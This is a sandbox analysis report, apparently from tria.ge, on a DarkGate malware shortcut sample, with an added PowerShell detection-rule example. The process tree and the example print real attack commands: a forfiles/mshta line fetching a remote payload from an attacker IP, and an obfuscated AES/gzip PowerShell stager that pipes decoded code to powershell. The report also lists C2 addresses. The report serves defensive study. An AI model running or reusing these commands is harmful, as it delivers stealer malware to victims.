Analysis
- max time kernel: 160s
- max time network: 172s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 12/03/2024, 03:44
- Static task static1
- Behavioral task behavioral1: sample a777dd29c0c24492eae7a4170d1599a5.lnk, resource win7-20240221-en
- Behavioral task behavioral2: sample a777dd29c0c24492eae7a4170d1599a5.lnk, resource win10v2004-20240226-en
General
- Target: a777dd29c0c24492eae7a4170d1599a5.lnk
- Size: 1KB
- MD5: a777dd29c0c24492eae7a4170d1599a5
- SHA1: a854b705c05dd4503d6de331cf1ad2716221c230
- SHA256: f31c862a31ee968dafb32532059403438d2cfa5aaf8b5b1ad089b6ac027cec34
- SHA512: 5b0a100f1d0f61f3f87cc0f00e1be2096e009fe7b690dd37f32a4e3bb1d47495130e604f013ec1cf8f0616262b65d46090f5c3c81ee04172a9736a2b37994425
Malware Config
Extracted (stager URL, the one forfiles.exe/mshta.exe fetch in the process tree)
- http://206.188.196.222/w1
Extracted
- darkgate
- admin000
- 145.239.202.110
- anti_analysis: false
- anti_debug: false
- anti_vm: false
- c2_port: 8094
- check_disk: false
- check_ram: false
- check_xeon: false
- crypter_au3: false
- crypter_dll: false
- crypter_raw_stub: false
- internal_mutex: WXMqRdAD
- minimum_disk: 100
- minimum_ram: 4096
- ping_interval: 6
- rootkit: false
- startup_persistence: true
- username: admin000

Reading the config: every anti-analysis switch (anti_analysis, anti_debug, anti_vm, check_disk, check_ram, check_xeon) is off in this build, so the minimum_disk (100) and minimum_ram (4096) thresholds are carried in the config but not enforced, which is consistent with the sample running to completion in the sandbox. startup_persistence is on, matching the Run key written by GoogleUpdateCore.exe in the signatures below. The C2 is 145.239.202.110 on port 8094.
Signatures

Detect DarkGate stealer (11 IoCs)
resource | yara_rule
behavioral2/memory/4672-140-0x0000000005930000-0x0000000005C7F000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-145-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4672-146-0x0000000005930000-0x0000000005C7F000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-150-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4552-161-0x0000000002B90000-0x0000000003332000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-189-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-190-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-192-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4552-201-0x0000000002B90000-0x0000000003332000-memory.dmp | family_darkgate_v6
behavioral2/memory/4476-252-0x00000000026A0000-0x0000000002E42000-memory.dmp | family_darkgate_v6
behavioral2/memory/4552-253-0x0000000002B90000-0x0000000003332000-memory.dmp | family_darkgate_v6

Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
description | pid | Process | procid_target
PID 4672 created 2412 | 4672 | Autoit3.exe | 72
PID 4672 created 988 | 4672 | Autoit3.exe | 83
PID 4672 created 680 | 4672 | Autoit3.exe | 7
PID 4476 created 2640 | 4476 | GoogleUpdateCore.exe | 48

Blocklisted process makes network request (3 IoCs)
flow | pid | Process
18 | 2224 | mshta.exe
33 | 3744 | powershell.exe
34 | 3744 | powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | mshta.exe

Executes dropped EXE (1 IoCs)
pid | Process
4672 | Autoit3.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EEaEaec = "C:\\ProgramData\\fkbhcdd\\Autoit3.exe C:\\ProgramData\\fkbhcdd\\ekhaadf.a3x" | GoogleUpdateCore.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Autoit3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Autoit3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe

Modifies Internet Explorer settings (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe

Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | powershell.exe

Suspicious behavior: EnumeratesProcesses (40 IoCs)
pid | Process | entries
760 | powershell.exe | 2
5084 | powershell.exe | 2
3744 | powershell.exe | 2
4672 | Autoit3.exe | 8
4476 | GoogleUpdateCore.exe | 4
1804 | AcroRd32.exe | 20
4552 | GoogleUpdateCore.exe | 2

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
4476 | GoogleUpdateCore.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 760 | powershell.exe
Token: SeDebugPrivilege | 5084 | powershell.exe
Token: SeDebugPrivilege | 3744 | powershell.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
1804 | AcroRd32.exe

Suspicious use of SetWindowsHookEx (5 IoCs)
pid | Process | entries
1804 | AcroRd32.exe | 5

Suspicious use of WriteProcessMemory (64 IoCs, identical rows collapsed with a count)
description | pid | Process | procid_target | entries
PID 1600 wrote to memory of 4732 | 1600 | cmd.exe | 91 | 2
PID 4732 wrote to memory of 760 | 4732 | forfiles.exe | 92 | 2
PID 760 wrote to memory of 2224 | 760 | powershell.exe | 93 | 2
PID 2224 wrote to memory of 5084 | 2224 | mshta.exe | 95 | 2
PID 5084 wrote to memory of 3744 | 5084 | powershell.exe | 97 | 2
PID 3744 wrote to memory of 1804 | 3744 | powershell.exe | 100 | 3
PID 1804 wrote to memory of 2768 | 1804 | AcroRd32.exe | 104 | 3
PID 2768 wrote to memory of 4884 | 2768 | RdrCEF.exe | 107 | 41
PID 2768 wrote to memory of 2676 | 2768 | RdrCEF.exe | 108 | 7
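The behaviour these signatures record (cmd.exe → forfiles.exe → powershell.exe → mshta.exe → powershell.exe, then a dropped AutoIt interpreter, a GoogleUpdateCore.exe with a spoofed parent, and a Run key) is what a detection engineer wants to turn into rules. The PowerShell below is an added example, not code from the report or from the sandbox: it runs six such rules over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The PIDs, image paths, command lines and the Run key value are copied or shortened from this report; the event shapes, the explorer.exe parent assumed for cmd.exe, the function and rule names are the example's own.

```powershell
# Added example, not part of the tria.ge report. Constructed Sysmon-style events built from
# the report's process tree and Run-key IoC; the parent of cmd.exe is not in the report and
# is assumed here. EventID 1 = process creation, EventID 13 = registry value set.
$events = @(
    @{ EventID = 1; ProcessId = 1600; ParentImage = 'C:\Windows\explorer.exe'   # parent assumed
       Image = 'C:\Windows\system32\cmd.exe'
       CommandLine = 'cmd /c C:\Users\Admin\AppData\Local\Temp\a777dd29c0c24492eae7a4170d1599a5.lnk' },
    @{ EventID = 1; ProcessId = 4732; ParentImage = 'C:\Windows\system32\cmd.exe'
       Image = 'C:\Windows\System32\forfiles.exe'
       CommandLine = '"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://206.188.196.222/w1' },
    @{ EventID = 1; ProcessId = 760; ParentImage = 'C:\Windows\System32\forfiles.exe'
       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell start mshta http://206.188.196.222/w1' },
    @{ EventID = 1; ProcessId = 2224; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       Image = 'C:\Windows\system32\mshta.exe'
       CommandLine = '"C:\Windows\system32\mshta.exe" http://206.188.196.222/w1' },
    @{ EventID = 1; ProcessId = 5084; ParentImage = 'C:\Windows\system32\mshta.exe'
       Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       # shortened copy of the stager command line; the Base64 blob is elided as on the report page
       CommandLine = '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $KwYpv = <blob>;$kbbrdQK = New-Object System.Security.Cryptography.AesManaged;$peosnCLg | powershell -' },
    @{ EventID = 1; ProcessId = 1804; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       Image = 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe'
       CommandLine = '"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"' },
    @{ EventID = 1; ProcessId = 4672; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       Image = 'C:\Users\Admin\AppData\Roaming\Autoit3.exe'
       CommandLine = '"C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.a3x' },
    @{ EventID = 1; ProcessId = 4476; ParentImage = 'C:\Windows\system32\lsass.exe'
       Image = 'C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe'
       CommandLine = '"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"' },
    @{ EventID = 13; ProcessId = 4552; Image = 'C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe'
       TargetObject = 'HKU\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EEaEaec'
       Details = 'C:\ProgramData\fkbhcdd\Autoit3.exe C:\ProgramData\fkbhcdd\ekhaadf.a3x' }
)

function Find-DarkGateChainIndicators {
    # Evaluates each rule against each event and emits one finding per match.
    param([Parameter(Mandatory)][object[]]$Events)

    $rules = @(
        @{ Name = 'forfiles.exe proxying powershell/mshta (LOLBin step launched from the .lnk)'
           Test = { param($e) $e.EventID -eq 1 -and $e.Image -match '\\forfiles\.exe$' -and
                    $e.CommandLine -match '/c\s+"?\s*(powershell|pwsh|mshta|cmd)\b' } },
        @{ Name = 'mshta.exe fetching a remote HTA over HTTP'
           Test = { param($e) $e.EventID -eq 1 -and $e.Image -match '\\mshta\.exe$' -and
                    $e.CommandLine -match '\shttps?://' } },
        @{ Name = 'powershell.exe with policy bypass and an inline AES/Base64/gzip loader'
           Test = { param($e) $e.EventID -eq 1 -and $e.Image -match '\\powershell\.exe$' -and
                    $e.CommandLine -match '-e(p|xecutionpolicy)\s+(Unrestricted|Bypass)' -and
                    $e.CommandLine -match 'AesManaged|FromBase64String|GzipStream' } },
        @{ Name = 'AutoIt interpreter running a .a3x script from a user-writable path'
           Test = { param($e) $e.EventID -eq 1 -and $e.Image -match '\\Autoit3\.exe$' -and
                    $e.Image -match '\\(AppData|ProgramData|Temp)\\' -and $e.CommandLine -match '\.a3x\b' } },
        @{ Name = 'child process of lsass.exe (parent chosen via NtCreateUserProcess)'
           Test = { param($e) $e.EventID -eq 1 -and [string]$e.ParentImage -match '\\lsass\.exe$' } },
        @{ Name = 'Run key pointing at Autoit3.exe with a .a3x script'
           Test = { param($e) $e.EventID -eq 13 -and $e.TargetObject -match '\\CurrentVersion\\Run\\' -and
                    $e.Details -match 'Autoit3\.exe.*\.a3x' } }
    )

    foreach ($e in $Events) {
        foreach ($r in $rules) {
            if (& $r.Test $e) {
                $evidence = $e.CommandLine
                if ($e.EventID -eq 13) { $evidence = "$($e.TargetObject) = $($e.Details)" }
                [pscustomobject]@{ Rule = $r.Name; ProcessId = $e.ProcessId; Evidence = $evidence }
            }
        }
    }
}

$hits = @(Find-DarkGateChainIndicators -Events $events)
$hits | Format-Table -AutoSize -Wrap
# One hit per rule is expected on the constructed input: 4732, 2224, 5084, 4672, 4476 and the Run key.
if ($hits.Count -ne 6) { throw "expected 6 findings, got $($hits.Count)" }
```

Run it in Windows PowerShell 5.1 or PowerShell 7; it prints the six findings and throws if the count differs. The decoy AcroRd32.exe launch and the first powershell.exe (`start mshta ...`, no policy switches) are deliberately left unmatched, since on their own they look like normal activity. The lsass.exe rule is the most portable of the six: lsass.exe does not normally spawn child processes, so any child is worth an alert regardless of the malware family that chose it as a parent.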
Processes
C:\Windows\system32\lsass.exe (PID 680)
  command line: C:\Windows\system32\lsass.exe
  C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe (PID 4476)
    command line: "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
C:\Windows\system32\taskhostw.exe (PID 2640)
  command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe (PID 4552)
    command line: "C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"
    - Adds Run key to start application
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\SppExtComObj.exe (PID 2412)
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe (PID 988)
  command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
C:\Windows\system32\cmd.exe (PID 1600)
  command line: cmd /c C:\Users\Admin\AppData\Local\Temp\a777dd29c0c24492eae7a4170d1599a5.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\forfiles.exe (PID 4732)
    command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://206.188.196.222/w1
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 760)
      command line: start mshta http://206.188.196.222/w1
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\mshta.exe (PID 2224)
        command line: "C:\Windows\system32\mshta.exe" http://206.188.196.222/w1
        - Blocklisted process makes network request
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5084)
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $KwYpv = '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';$qUoZKXum = 'RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4=';$kbbrdQK = New-Object 'System.Security.Cryptography.AesManaged';$kbbrdQK.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kbbrdQK.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kbbrdQK.BlockSize = 128;$kbbrdQK.KeySize = 256;$kbbrdQK.Key = [System.Convert]::FromBase64String($qUoZKXum);$LGvCV = [System.Convert]::FromBase64String($KwYpv);$QwRLGiHB = $LGvCV[0..15];$kbbrdQK.IV = $QwRLGiHB;$hBUppQDnl = $kbbrdQK.CreateDecryptor();$MoYXNlkIj = $hBUppQDnl.TransformFinalBlock($LGvCV, 16, $LGvCV.Length - 16);$kbbrdQK.Dispose();$NeMj = New-Object System.IO.MemoryStream( , $MoYXNlkIj );$NjSGYp = New-Object System.IO.MemoryStream;$iiYETcerF = New-Object System.IO.Compression.GzipStream $NeMj, ([IO.Compression.CompressionMode]::Decompress);$iiYETcerF.CopyTo( $NjSGYp );$iiYETcerF.Close();$NeMj.Close();[byte[]] $iFVgn = $NjSGYp.ToArray();$peosnCLg = [System.Text.Encoding]::UTF8.GetString($iFVgn);$peosnCLg | powershell -
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3744)
            command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
            - Blocklisted process makes network request
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (PID 1804)
              command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
              - Checks processor information in registry
              - Modifies Internet Explorer settings
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 2768)
                command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                - Suspicious use of WriteProcessMemory
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 4884)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C1E0DE53EF91292E4DDB6FAADD7D77BB --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 2676)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=02E75EC852AA0B198E8DEC5C91E676B7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=02E75EC852AA0B198E8DEC5C91E676B7 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 784)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7FE5022DEBD9BD33D8DEA657D7C8E7DB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7FE5022DEBD9BD33D8DEA657D7C8E7DB --renderer-client-id=4 --mojo-platform-channel-handle=2172 --allow-no-sandbox-job /prefetch:1
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 768)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FD816A66CC6BEBAF45053FF1B5F53EBF --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3796)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=09C61B507E187CA1350F5E65A8964BB0 --mojo-platform-channel-handle=1888 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (PID 3848)
                  command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA771999DAE75C3A56B780520333F11E --mojo-platform-channel-handle=2524 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            C:\Users\Admin\AppData\Roaming\Autoit3.exe (PID 4672)
              command line: "C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.a3x
              - Suspicious use of NtCreateUserProcessOtherParentProcess
              - Executes dropped EXE
              - Checks processor information in registry
              - Suspicious behavior: EnumeratesProcesses
C:\Windows\System32\CompPkgSrv.exe (PID 3936)
  command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

Reading the tree: the infection chain is cmd.exe (opening the .lnk) → forfiles.exe → powershell.exe → mshta.exe (fetching http://206.188.196.222/w1) → powershell.exe 5084 (the AES/gzip stager) → powershell.exe 3744 (the decoded stage read from stdin), which then opens sample.pdf in AcroRd32.exe, presumably the decoy shown to the user, and runs the dropped AutoIt interpreter on script.a3x. The two GoogleUpdateCore.exe instances are shown under lsass.exe and taskhostw.exe rather than under that chain: the NtCreateUserProcessOtherParentProcess signature above records Autoit3.exe (4672) creating a process with parent 680 (lsass.exe) and GoogleUpdateCore.exe (4476) creating one with parent 2640 (taskhostw.exe), so the parent the tree shows is the one the malware selected, not the process that created the child. The two remaining entries of that signature (parents 2412 and 988) have no child visible in this tree.
